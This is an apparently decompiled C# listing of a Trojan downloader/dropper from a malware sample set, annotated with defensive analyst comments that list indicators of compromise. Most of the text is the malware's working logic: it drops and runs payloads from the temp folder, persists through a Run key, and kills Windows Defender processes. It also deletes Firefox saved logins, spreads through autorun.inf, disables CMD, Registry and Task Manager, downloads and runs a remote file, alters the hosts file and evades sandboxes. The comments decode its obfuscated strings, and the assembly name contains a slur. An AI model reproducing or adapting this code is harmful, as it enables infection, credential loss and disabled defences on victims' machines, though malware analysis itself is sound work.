// Decompiled with JetBrains decompiler
// Type: UWLUFUDALKLWDKKSWDKFWOIKK97
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
using System.Windows.Forms;
// Analyst notes (defensive reading of decompiler output; the listing is not compilable as shown).
// This module is the entry stub of a binder/dropper: Main() reads its own executable as text,
// cuts out an appended blob by marker string, decodes it through rp.eqwrsdafasdf (helper class
// "rp" is not part of this listing), and then acts on the decoded array purely by position.
// Observable artefacts a responder can look for, all taken from the code below:
//   - executables written to %TEMP% and started immediately afterwards
//   - an HKCU ...\CurrentVersion\Run value pointing into %TEMP%
//   - policy values DisableCMD, DisableRegistryTools and DisableTaskMgr under HKCU
//   - a hidden autorun.inf next to a copied executable at the root of each logical drive
//   - a write to the hosts file, and termination of processes by name substring
// Most string constants are hidden behind UWLUFUDALKLWDKKSWDKFWOIKK591415 (repeating-key XOR);
// the decoded values quoted in the comments were derived by applying that routine by hand.
[StandardModule]
public sealed class UWLUFUDALKLWDKKSWDKFWOIKK97
{
/// <summary>
/// Entry point. Unpacks the appended configuration and runs each optional behaviour
/// whose flag field is true. No return value; most steps have no error handling.
/// </summary>
[STAThread]
public static void Main()
{
// The stub's own file is read as text and split on a fixed marker; elements [1] and [2]
// are passed to rp.eqwrsdafasdf (not visible here, presumably ciphertext and key - TODO confirm).
string[] strArray1 = Strings.Split(File.ReadAllText(Application.ExecutablePath), "&^Q@#&*$^*&!@$");
// Decoded configuration, split on a second marker. Layout as used below:
//   [1]..[10]  embedded file contents ("SHIT" marks an empty slot)
//   [11]..[20] file names for those slots
//   [21]..[32] Boolean feature flags
//   [33]       download URL, [34] target passed to Process.Start
string[] strArray2 = Strings.Split(rp.eqwrsdafasdf(strArray1[1], strArray1[2]), "AJJFIOEURASJFKLJSAIODF");
// Slot 1 is the only slot with two paths: if its name contains ".exe" the bytes go to
// rp.inject (not visible here; NOTE(review): looks like in-memory execution - confirm),
// otherwise the content is written to %TEMP%\<name> and started.
if (Operators.CompareString(strArray2[1], "SHIT", false) != 0)
{
if (strArray2[11].Contains(".exe"))
{
rp.inject(Encoding.Default.GetBytes(strArray2[1]));
}
else
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[11], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[1], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[11]);
}
}
// Slots 2..10 repeat one pattern: write the slot content to %TEMP%\<name> through VB file
// number 5, then start it. Each write is followed directly by a process start from %TEMP%.
if (Operators.CompareString(strArray2[2], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[12], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[2], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[12]);
}
if (Operators.CompareString(strArray2[3], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[13], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[3], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[13]);
}
if (Operators.CompareString(strArray2[4], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[14], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[4], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[14]);
}
if (Operators.CompareString(strArray2[5], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[15], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[5], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[15]);
}
if (Operators.CompareString(strArray2[6], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[16], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[6], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[16]);
}
if (Operators.CompareString(strArray2[7], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[17], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[7], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[17]);
}
if (Operators.CompareString(strArray2[8], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[18], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[8], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[18]);
}
if (Operators.CompareString(strArray2[9], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[19], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[9], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[19]);
}
if (Operators.CompareString(strArray2[10], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[20], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[10], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[20]);
}
// Flag [21]: security-tool tampering plus environment checks. The two XOR strings decode to
// "MSASCui" and "msmpeng"; any process whose name contains either is killed, then the two
// exit-if-analysed checks run.
if (Conversions.ToBoolean(strArray2[21]))
{
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK16(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "~`rdrFZ"));
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK16(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@^GT]T"));
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK17();
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK18();
}
// Flag [22]: persistence. The running assembly is copied to %TEMP%\msconfig.exe (decoded
// name) if absent, and a value named "Microsoft Configuration" is set under
// HKCU\software\Microsoft\Windows\CurrentVersion\Run (both decoded) pointing at that copy.
if (Conversions.ToBoolean(strArray2[22]))
{
if (!File.Exists(Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV")))
File.Copy(Assembly.GetExecutingAssembly().Location, Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV"));
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@\\UCFRAVk|ZPAXB\\UGkfZ]WXF@opBCAV]CgVA@^^]oaB_"), true);
registryKey.SetValue(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "~ZPE^@\\UC\u0011p\\]QXTFAVEZ\\]"), (object) (Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV")));
registryKey.Close();
}
// Flag [23]: deletes every file whose path contains "signon" in each directory under
// %APPDATA%\Mozilla\Firefox\Profiles. Firefox kept saved logins in signons* files; the
// purpose of deleting them is not shown here.
if (Conversions.ToBoolean(strArray2[23]))
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (Directory.Exists(str))
{
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
MyProject.Computer.FileSystem.DeleteFile(file);
}
}
finally
{
// Decompiler artefact: the enumerator local is declared but never assigned in this rendering.
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
// Same decompiler artefact as the inner finally block.
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
// Flag [24]: removable/other drive propagation. For every logical drive the assembly is
// copied to <drive>setup.exe (decoded) if absent, and <drive>autorun.inf (decoded) is written
// with the lines "[autorun]", "open=setup.exe", "shellexecute=setup.exe", then marked Hidden.
// No exception handling: a read-only or not-ready drive would throw out of Main.
if (Conversions.ToBoolean(strArray2[24]))
{
string[] logicalDrives = Directory.GetLogicalDrives();
int index = 0;
while (index < logicalDrives.Length)
{
string str = logicalDrives[index];
if (!File.Exists(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@VGBA\u001DVKR")))
File.Copy(Assembly.GetExecutingAssembly().Location, str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@VGBA\u001DVKR"));
StreamWriter streamWriter = new StreamWriter(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "RFGXCF]\u001D^_U"));
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "hRFC^AF]j"));
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "\\CVY\f@VGBA\u001DVKR"));
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@[V[]VKVTDGV\u000EDTGFC\u0019TKV"));
streamWriter.Close();
File.SetAttributes(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "RFGXCF]\u001D^_U"), FileAttributes.Hidden);
checked { ++index; }
}
}
// Flag [25]: hands "C:\" and the stub's own path to the archive routine at the end of this class.
if (Conversions.ToBoolean(strArray2[25]))
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK26("C:\\", Application.ExecutablePath);
// Flag [26]: file-sharing lure. If <ProgramFiles>\limewire\shared\ exists, one copy of the
// running executable is placed there per directory found under Program Files, named
// "<directory name>-crack.exe" (existing files overwritten). The counter num is never read.
if (Conversions.ToBoolean(strArray2[26]))
{
int num = 0;
foreach (object obj in new ArrayList()
{
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\limewire\\shared\\")
})
{
string path = Convert.ToString(RuntimeHelpers.GetObjectValue(obj));
if (Directory.Exists(path))
{
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
int index = 0;
while (index < directories.Length)
{
string str = directories[index];
string destFileName = path + "\\" + str.Substring(str.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
File.Copy(Process.GetCurrentProcess().MainModule.FileName, destFileName, true);
checked { ++num; }
checked { ++index; }
}
}
}
}
// Flag [27]: sets the per-user policy value DisableCMD to 1 (DWord).
if (Conversions.ToBoolean(strArray2[27]))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
// Flag [28]: downloader. Fetches the URL held in field [33] to %TEMP%\msconfigdl.exe and starts it.
// The URL lives only in the encrypted configuration, so it is not recoverable from this listing.
if (Conversions.ToBoolean(strArray2[28]))
{
MyProject.Computer.Network.DownloadFile(strArray2[33], Path.GetTempPath() + "msconfigdl.exe");
Process.Start(Path.GetTempPath() + "msconfigdl.exe");
}
// Flag [29]: starts whatever field [34] names (file, program or URL - the value is not visible here).
if (Conversions.ToBoolean(strArray2[29]))
Process.Start(strArray2[34]);
// Flag [30]: hosts-file tampering. The path decodes to C:\Windows\System32\drivers\etc\hosts and
// the second string to "127.0.0.1 www.virustotal."; StreamWriter(path) replaces the file rather
// than appending. As decompiled, what gets written is the text form of a Boolean comparison,
// not the decoded entry - NOTE(review): presumably a hosts redirect was intended; confirm in the IL.
if (Conversions.ToBoolean(strArray2[30]))
{
StreamWriter streamWriter = new StreamWriter(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("SAFDFAF", "\u0002|\u0018\u0011((7.17\u001A\u0012? 5#)us\u001A73/2#35\u000F$2'\u001A)) 55"));
string str = Conversions.ToString(Operators.CompareString("\n" + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("SAFDFAF", "ptshqhcowd161}7/6322<5'(h"), ")", false) > 0);
streamWriter.Write(str);
streamWriter.Close();
}
// Flag [31]: sets the per-user policy value DisableRegistryTools to 1 (DWord).
if (Conversions.ToBoolean(strArray2[31]))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
// Flag [32]: sets DisableTaskMgr through a hidden "REG add" command line, so a reg.exe child
// process with these arguments is the artefact, rather than a direct registry API call.
if (!Conversions.ToBoolean(strArray2[32]))
return;
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
}
/// <summary>
/// String de-obfuscation: XORs each character of the second argument with a character of the
/// first argument (the key) and returns the result.
/// </summary>
/// <param name="UWLUFUDALKLWDKKSWDKFWOIKKas">Key string, repeated cyclically.</param>
/// <param name="UWLUFUDALKLWDKKSWDKFWOIKKdaze">Obfuscated text.</param>
/// <returns>The decoded string.</returns>
public static string UWLUFUDALKLWDKKSWDKFWOIKK591415(
string UWLUFUDALKLWDKKSWDKFWOIKKas,
string UWLUFUDALKLWDKKSWDKFWOIKKdaze)
{
long num1 = (long) Strings.Len(UWLUFUDALKLWDKKSWDKFWOIKKdaze);
// Positions are 1-based, as in VB's Mid().
long Start = 1;
// Decompiler artefact: str is never initialised before "+=" in this rendering.
string str;
while (Start <= num1)
{
int num2 = Strings.Asc(Strings.Mid(UWLUFUDALKLWDKKSWDKFWOIKKdaze, checked ((int) Start), 1));
// Key index is (Start mod keyLength) + 1, so the first text character pairs with the
// SECOND key character; a decoder that starts at key[0] produces garbage.
int num3 = Strings.Asc(Strings.Mid(UWLUFUDALKLWDKKSWDKFWOIKKas, checked ((int) (unchecked (Start % (long) Strings.Len(UWLUFUDALKLWDKKSWDKFWOIKKas)) + 1L)), 1));
str += Conversions.ToString(Strings.Chr(num2 ^ num3));
checked { ++Start; }
}
return str;
}
/// <summary>
/// Kills every running process whose name contains the given substring (case-sensitive
/// String.Contains). Failures to kill are swallowed.
/// </summary>
/// <param name="UWLUFUDALKLWDKKSWDKFWOIKK86">Substring to look for in Process.ProcessName.</param>
public static void UWLUFUDALKLWDKKSWDKFWOIKK16(string UWLUFUDALKLWDKKSWDKFWOIKK86)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (process.ProcessName.Contains(UWLUFUDALKLWDKKSWDKFWOIKK86))
{
try
{
process.Kill();
}
catch (Exception ex)
{
// VB "On Error Resume Next"-style handling: the exception is recorded and cleared.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
/// <summary>
/// Sandbox check: exits the process with code 0 when a process named "SbieSvc"
/// (the Sandboxie service) is running.
/// </summary>
public static void UWLUFUDALKLWDKKSWDKFWOIKK17()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
/// <summary>
/// Analysis check: exits with code 0 when the path of the running executable contains
/// "sample" (case-sensitive), so the file name chosen for detonation affects behaviour.
/// </summary>
private static void UWLUFUDALKLWDKKSWDKFWOIKK18()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
/// <summary>
/// Collects *.zip paths while recursing, then starts a hidden 7z.exe "a" (add) command per
/// archive with the second argument as the file to add.
/// </summary>
/// <param name="UWLUFUDALKLWDKKSWDKFWOIKK87">Directory whose sub-directories are enumerated.</param>
/// <param name="UWLUFUDALKLWDKKSWDKFWOIKK88">Path appended to the 7z command line (the caller passes the stub's own path).</param>
public static void UWLUFUDALKLWDKKSWDKFWOIKK26(
string UWLUFUDALKLWDKKSWDKFWOIKK87,
string UWLUFUDALKLWDKKSWDKFWOIKK88)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
// A WinForms ListBox is used only as a list container; nothing is displayed.
ListBox listBox = new ListBox();
try
{
string[] directories = Directory.GetDirectories(UWLUFUDALKLWDKKSWDKFWOIKK87);
int index1 = 0;
while (index1 < directories.Length)
{
// str1 is never used: the search and the recursion both go through the parameterless
// FileSystem.Dir(), whose result depends on an earlier Dir(pattern) call that this
// listing does not show. Any exception is swallowed by the catch below.
string str1 = directories[index1];
string[] files = Directory.GetFiles(FileSystem.Dir(), "*.zip");
int index2 = 0;
while (index2 < files.Length)
{
string str2 = files[index2];
listBox.Items.Add((object) str2);
checked { ++index2; }
}
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK26(FileSystem.Dir(), UWLUFUDALKLWDKKSWDKFWOIKK88);
checked { ++index1; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
foreach (object obj in listBox.Items)
{
string str = Conversions.ToString(obj);
// The tool path is the literal "<ProgramFiles>\7-Zipz\7z.exe" and the arguments are
// concatenated without quoting. This try has no catch, so a failed start propagates.
Process.Start(new ProcessStartInfo()
{
FileName = folderPath + "\\7-Zipz\\7z.exe",
Arguments = " a " + str.ToString() + " " + UWLUFUDALKLWDKKSWDKFWOIKK88,
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
finally
{
// Decompiler artefact: enumerator is declared but never assigned in this rendering.
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
}